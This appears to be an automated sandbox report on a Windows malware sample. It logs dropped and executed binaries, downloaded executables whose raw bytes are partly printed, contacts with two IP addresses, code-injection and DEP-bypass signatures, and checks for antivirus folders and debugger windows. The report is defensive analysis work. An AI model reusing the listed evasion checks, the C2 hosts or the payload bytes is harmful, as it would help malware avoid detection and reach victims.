__exception__ July 27, 2024, 12:28 p.m.	stacktrace: 0xaa1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaa1f04 registers.r14: 10157216 registers.r15: 10156720 registers.rcx: 48 registers.rsi: 15754720 registers.r10: 0 registers.rbx: 0 registers.rsp: 10155768 registers.r11: 10157968 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 10156551 registers.rbp: 10155888 registers.rdi: 100 registers.rax: 11149056 registers.r13: 2	1	0	0
__exception__ July 27, 2024, 12:35 p.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10482152 registers.r15: 8791430174320 registers.rcx: 48 registers.rsi: 8791430105984 registers.r10: 0 registers.rbx: 0 registers.rsp: 10481784 registers.r11: 10485168 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092883536 registers.r12: 14910784 registers.rbp: 10481904 registers.rdi: 69319264 registers.rax: 13442816 registers.r13: 10482744	1	0	0
__exception__ July 27, 2024, 12:35 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8648512 registers.r15: 8648016 registers.rcx: 48 registers.rsi: 14706912 registers.r10: 0 registers.rbx: 0 registers.rsp: 8647064 registers.r11: 8649264 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 8647847 registers.rbp: 8647184 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ July 27, 2024, 12:35 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8583296 registers.r15: 8582800 registers.rcx: 48 registers.rsi: 14705856 registers.r10: 0 registers.rbx: 0 registers.rsp: 8581848 registers.r11: 8584048 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 8582631 registers.rbp: 8581968 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ July 27, 2024, 12:35 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9959296 registers.r15: 9958800 registers.rcx: 48 registers.rsi: 14706336 registers.r10: 0 registers.rbx: 0 registers.rsp: 9957848 registers.r11: 9960048 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 9958631 registers.rbp: 9957968 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
file	C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
file	C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 27, 2024, 12:34 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	1	1
ShellExecuteExW July 27, 2024, 12:34 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe	1	1
ShellExecuteExW July 27, 2024, 12:34 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000002b4dc450000 process_handle: 0xffffffffffffffff	1	0	0

An executable file was downloaded by the process explorti.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 27, 2024, 12:34 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Tgsú ú ú pQ ú pd ú pP tú ~i ú û dú pU ú p` ú pg ú Richú PEL,eà xé 0@`äXxÀ\Y°S@0¼.textp `.rdataè204@@.data.pÜR@À.casiwidÓ .@@.mufu°2@À.rsrcÀ6@@VñÇ¤SBèÒöD$tVèóYÆ^Âá4ïÆÃUìì,¡ BEØ¡$BV3W{3ÉEÜEøuðMøèÌÿÿÿ¡(BEø?Eè¡,BEäÇEì ÇEôEôÆÁàEèEà¡ô~D=©u Çð~D@.ëí=ëu \|yDEðÁèEüEüEäUøÖ3Â3Eà=ô~DÇì~Dî=êôEüuQQQQÿ0BEü3É+ø=ô~DuEÔPQQQÿ°0Bjÿ´0B3ÉÇÁèEüEÜEüUøEøGÈaÇÁàEØ×3Â3Eü+ðÿMìuð/ÿÿÿ{_3^ÉÃUì¡ô~D yDìVÁè3ö;ÆSWÙø=ô~DY uvVVÿ`0BVVüÿÿPÿ$0BVVVÿ0BVVVVVVVhÀQBÿ 0BhRBVÿ@0Bh8RBVÿ40BVVÿ0BVôÿÿPVhpRBVVÿ 0BVÿp0BVÿ0Bè,þÿÿÃOoÿÿÿ_[^ÉÃUììSVW3ö3ÿÿ0BÿBq Gÿ}\|é=ô~D½Vÿx0BVVVVÿ0B3Àðº(VVÿ¼0BVVVVVVÿL0BVVVÿ(0BÿuøVVVVVVVVVVÿ1BVVVVVÿ´1BVVVÿ<0BVì÷ÿÿPVÿl0Bh°RBhÌRBhXCèrVVVVè& VVèÄ$EüPMìÇEüðRBèÑMìÇEì¤SBèéVVècYY¡<¨Bô~DKhSB£0Dÿ0BhSBP£yDÿ¸0Bÿ5ô~D£xyDVÿ00BMøQj@ÿ5ô~D£yDPÿxyD3ÿÿÌ }(VVÿ 1BVEüPVVVÿ0BVVVVVÿ0BVÿ¬1BVVVÿP0Bÿä[ Gÿ3\|¶d0B¿.iVì÷ÿÿPÿ1Bÿ¤1BÿÓOuç95ô~DvV¡0D8K yD9=ô~Du,VVVVÿ0Bÿ,0BVÿp0BEüPVVVÿ0BVVÿt0BG;=ô~Drª3ÿ¡ô~DÇ=uVVÿD0BVÿ1Bh SBhPSBÿ0BGÿ\|Êèéüÿÿ3ÿÿÓÿauuüEüEüyDGÿ½t\|Ýj{_=ô~Du-VVVVVVVÿX0BVVÿ\|0BVÿ\0BVVVVÿ0BVÿH0BOuÄhSBÿp0BÿyD_^[ÉÃìV3ö=ô~DWuEVVVVÿ0BVVVVVVVVVVÿ¨1BVVèP VVèñVèÞVVè"Vè VVèÛÄ(3ÿÿm}VVVVVÿ0BVÿh0Bÿd0BVÿ0Bÿþ. Gÿ\|È¡d¨B£ô~Dèüÿÿ¿7ì=ô~DuVD$PÿT0BOuå_3À^ÄÂÿUìì eàWjY3À}äó«_9Euè;ÇèÞÈÿÉÃEÀtäVÿuEèÿuEàÿuEàPÇEäÿÿÿÇEìBèu ÄÿMäðxEàÆë EàPjèÆ YYÆ^ÉÃÿUìÿujÿuÿuègÿÿÿÄ]ÃAÀu¸(2BÃÿUì}Wùt-VÿuèÞpVè:YYGÀtÿuVPèÈÄÆG^_]ÂÿVñ~t ÿvè-YfÆF^ÃÿUìEVñfÇ 2BÆFÿ0èÿÿÿÆ^]ÂÇ 2Bé°ÿÿÿÿUìVñÇ 2BèÿÿÿöEtVèYÆ^]ÂjhpUBè" 3ÿ}ä3Àu;÷À;Çuè×ÇèzÈÿé´VèY}üöF@uoVè°YøÿtøþtÐÁúÈáÁá`Dë¹ tBöA$u)øÿtøþtÈÁùàÁà`Dë¸ tBö@$tèTÇè÷Mäÿ9}äu!ÿNxE¶ÀÿëVÿuè YYEäÇEüþÿÿÿèEäèÃuVèSYÃÿUìQeüVEüPÿuÿuè!ðÄöu9EütèÒÀt èÉMüÆ^ÉÃÌÌW\|$ën¤$ÿL$W÷ÁtÁÀt=÷Áuïÿºÿþþ~Ððÿ3ÂÁ©tèAüÀt#ät©ÿt©ÿtëÍyÿë yþëyýëyüL$÷ÁtÁÒtfÇ÷ÁuêëÇºÿþþ~Ððÿ3ÂÁ©táÒt4öt'÷Âÿt÷ÂÿtëÇD$_ÃfD$ÆG_ÃfD$_ÃD$_ÃÿUìÿuj jÿuè"Ä]ÃÿUì]éÜÿÿÿÿUì}uèÇè4Èÿ]ÃEÀtäjÿpÿ0ÿuèó"Ä]ÃÿUììMS]VW}Mø]üÿt}tÉuè9ÇèÜ3À_^[ÉÃuötÈÿ3Ò÷÷9Ev!ûÿtSjQèY+ÄötÁÈÿ3Ò÷÷9Ewµ¯}÷F}ðßtFEôëÇEôÿÚ÷FtDFÀt=òû;Ørø;}ü»Wÿ6ÿuüÿuøèk)~>}ø+ßÄ)}ü}ðé;]ôr\}ôt¹ÿÿÿ3Ò;Ùv Á÷uôÁëÃ÷uôÃ+Âë¸ÿÿÿ;ØwÃ;Eüw[PÿuøVè;YPè)ÄÀt{øÿtdEø+Ø)Eüë$Vè"YøÿtR}üt"MøÿEøFKÿMüEôÛ&ÿÿÿEé¼þÿÿ}ÿtÿujÿuè(ÄèÍÇ"éþÿÿN Ç+Ã3Ò÷uéþÿÿNëìjhUBèÑ3öuä9ut/9ut9uu-}ÿtÿuVÿuèË)ÄèpÇè3ÀèÖÃÿuè4Yuüÿuÿuÿuÿuÿuè×ýÿÿÄEäÇEüþÿÿÿèEäëÃÿuèpYÃÿUìÿuÿuÿuj request_handle: 0x00cc000c	1	1	0
InternetReadFile July 27, 2024, 12:34 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELd¤fà"¬ ÆDXÀ @pÊ@ P@N MLÐè0@@° @àÀ ò@àÀö@à@ öú@àPbð @à.rsrcÐR@@°x`(à@à.data`!^!@à4[Í;ù?oËYpi5'm¡m¤-½MÍ(ãm$Â;k·t SB´@SAeabÇÙGÍyöçS# Y¡ÜÀ Ç Iô3^%5Ø¡á&¸Ö%hÜP£iÎ°R^ îÊ¸ZþºF1ky ðÿþ¸©Ë}Å½6 xdÙ³wÝ+®C¹¤)cÂà@b5xÆøAí=m°V3PÜ6@wùªÖWü1âxÉNM"`½aå¨Út§úºè)~Ø4Bµx¯nW4bW©gJ^IuËÊÝi`ÍÉ=Ðeh¬$àôóX?¦1ìÌ¥üââ3`¼Æhªª@¤i«$~!D4ÅËÂ¿4p2Q.ÄØ<3©â(³ÓB]!«U¾¨Ñ"¡#Ù©mJìØµdqD^@æ%¥=\|© ôç0¢áJv<ê³î8ª6éÿ_4£\§ëü¸¥T&ÎÐt5D«ÌV³HÃNWÕMº½TôÒÀ±bÀéÎàWÞ3eàf[mwQ~2ÕC5qkZF91¦²9'EÔÏ_>éZã#e7ÈÛ<sâwIÐý@ÿÁ÷Å£®á®G4Þ×q{Rôÿo0B¤¼ÎTZÆÄ¾Ö A±0$Æ´l¶A©)yàS¦IÔ3zu(é¯ºIîyÆú)zi ÷1¥Øûâ\ÇÔ¼»#k7Ë«-4Símý-\o±üôÿùµÚ4S&ØúÁÜüåÞ±@÷àÒÁNDEß¡U´Tlª¢?.ÁKzÛÒÐS³°ÛFjùÏe¿gÚÚö#,®VãµHÀxÄýX0¢÷Ðw\ohäÓÐÀÎ,û@¼öU7 æ8ÿÏõ%æ½§Ý=Aéæm3½ýàbö2Ki:÷Ø6©'}½Ãª4s,1@Ê¶OÔó½÷Ùÿ®çÞ¹bé3ÉRök§x'M;J0{4ª\|òm Â»ìµ0Ñ%xQñOá¶+R¿èZ(LfÉü·ëØ¯_I"±ËT-kãJ` ¯íH¡ÌLIóÎOÏ§¿Î+ëßsx9ÅÖ DóF ìTdQ´íì¿UÛ}óíÔ)rLøÌL¡kÛðA8;UÔèç%»Ûóý4Ö¹³+õàËx¡Êf=^°=rc»5ËÅÄ\|XEB~Zè×»«®b >gSÀ3§¶8bd(óT9ßàÓpÝ@ < m «½íÃ$ì5¥Ïdõ¿ÓÙ¸3l¶(B{ý¢YéÄöwbbZ ¨ åÏé@`ðêPrÕ¶c}'-öÔÈ7Bá£lÝ° 59DaJÿ)';g£¨:_öïEå×\z«´×"dË¯ä ËTÎÓÈ×ÌD/d¨3¸8ÐÒ ©/&·³óú%8E\ëô/uSè#ÙØä#'ìÖhËãk\©ù×]øÁ-ÙåÓMbwg^·âàæÔHÜæÍWLõmöìjaâtÇ^¿(Vï×I.7ýíÛzBÃÔoÓuTùë>£ê®©(ªÖØW_;$¥l:ßkÈ@ ÖbHÒZõRãUG\| õ<akL½¿ÈLzÉØ£g¯fò¶Jä:I;Æáþ,e]G®íÚâôëÿzààRéHh±¥7èíxñyp<ÖÏd2 R©÷<p'ü~aEµv}§úð0ËDÕEI°:i$âNË~Ã:ÖTùå#÷Oú±°åÉÿ¸ª¨ImÉ!7I¦iÑ$=½Á 3O½&»²mSÁ;3½Í½´Èá-Z%AÈó9ëÖü°÷gøgY³å/sæ³µju/®õaN¡²ê±(ÌOüÔKÞæê2ÝgËíh³Òû;W×½d¡æoÐâ¶nfRè-<#%jÆb¿]Êª ¿u6¨X¿¸ ãüfõëKL¾§6Mxf\ç²=Wùë{ºÒcòQ Àò¤v¾ãíTb t\|²¹<(ûJ\¿ÖJ;{îø£xùP¤÷<®dîíÜýSæßrÅ±'¶8Ò-¼;ÖbÔíN Wñ0¶ÉoçÄÚnÛµtµØçkYÕ?Xml¤þùCP@ñebÜ ¥î¶ó}ÿÇ µãP\Èø¿2ù53áêâ¯èáN>8("Åºë{Û å´[Ä`!t0 ÔR²£ ®r%¼IÜv¦²¤& ÍudÊ»a3ñÐ³f2<Ò-Ë;oZJhså=%\|Êäî¸T¿üÖFsÉ ª_fßÚn8íf¨««µ ¡ë0ÏBêÅ¥õå2d[8û-uK~\â/º~èXhsÛØEYL8)t·5Tâ xjJ`r~èMô0ÍOþàÕé6F6µÅ×Ê«Û2B!GC_1SnäS÷I]°^p'Q`k" Fá ¶¡LhI²ü¸^éñúÌæEa9µX):³OqõÀËøÑlÉ®}RNpR¡ÊÅû$¬e¯ËÕÛw¸ÄluÃ¢ÅÖÎ99êü»W°?´ÚÙNÀÇX=ÇLqíÀèùâ²»Î!\ÖVdY_$}º)m®ûê³%&²ùDÕ_ìVó&«ëÌÌpÏ~$>0îaßùEajýÓÐr-N&N#\|ÁpÛ[»^'æÙjLçï5ó¿-{a]¸÷P/<Î7xôa²³\|e9röÂpé?R9jMgpà5è¹fø ÒJXºS¨bBÕ}ê¦wÀI¼ëA¸x¢Æ×) mÿÝ7ýÙ9=#þ/L¹ãÆx½ðG´º«b½<²TáØhëÅ[ñ>ió´iV¡)¡â¯zî9ÑH n¦ÝPë4Õÿ»ÖZXSUMh,MÙâPnjØÃ)Üiú_é§Ãi6Au&6ÃÀá%¹:æî Ý~°K·3ïH+ÿä?tS Ô²!UcïÍ=+±MgQ^øà_hRÉèÂfBóÓ®µGèAPX~¶psîD´¡_ãaÒAØý±K°ìJðàK'äsTOw¥¿69Ìf´ªw£výº¢i4(9«ëg³³nüHááQ¾JägÃx¥>éäJ÷MNàl¥ÌÄ½²þ zC[ÚÜ Ë¼VÌtíß~åÊÁ¼Ò,à¬r_[áxª]FBÎa$Þ[×øZNh5FLßcK5t}wRÉÒª©5PNeZm+zÔ^eÍ'çÜø%Z ÐzõÊãJQ¨9éßyk$®IZqjOÔõó5ùÏ~xKÀ){ó>g¢0aXö9 6úKJ«õîX-$®P!ïc3YQçH=ºÝ0S+4 TÍ75ø)çJ÷ÍøH¦Ä{æ+ì¬Ñ6hºÍÚ¿pÑ2³82Ê¢ þ¯>'Û`:bu§ÒMb)Z7+d¾ÖáVÿ] ±P/iþ³Ç¯WK~~\|hã\Gf_½½ßRTCJùJcQìJºåºÇJEÙ3^^±¾N¥fó]¤"[ðhAzêMº¯¨ôSJáüÔy4½æÄÓó<ì¾éI·ç(¿û0 kÄKíA´t¬¼ÈüzBfÊéà!Ä&ªË"äËtwÅ^m*ë³%ÑvÕ request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0002dc00', u'virtual_address': u'0x00001000', u'entropy': 7.987936779363102, u'name': u' \\x00 ', u'virtual_size': u'0x00068000'}

entropy

7.98793677936

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001ac000', u'virtual_address': u'0x00327000', u'entropy': 7.954168133889617, u'name': u'lybfcffv', u'virtual_size': u'0x001ac000'}

entropy

7.95416813389

description

A section with a high entropy has been found

entropy

0.994228751312

description

Overall entropy of this PE file is high

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c

Yara rule detected in process memory (50 out of 72 events)

description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Communicates with host for which no DNS query was performed (2 events)

host	185.215.113.16
host	185.215.113.19

Allocates execute permission to another process indicative of possible code injection (14 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 1528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 1528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2276 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2276 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x000000000000004c	1
NtProtectVirtualMemory July 27, 2024, 12:35 p.m.	process_identifier: 1784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x000000000000004c	1

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 367 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: RegmonClass window_name:		0	0
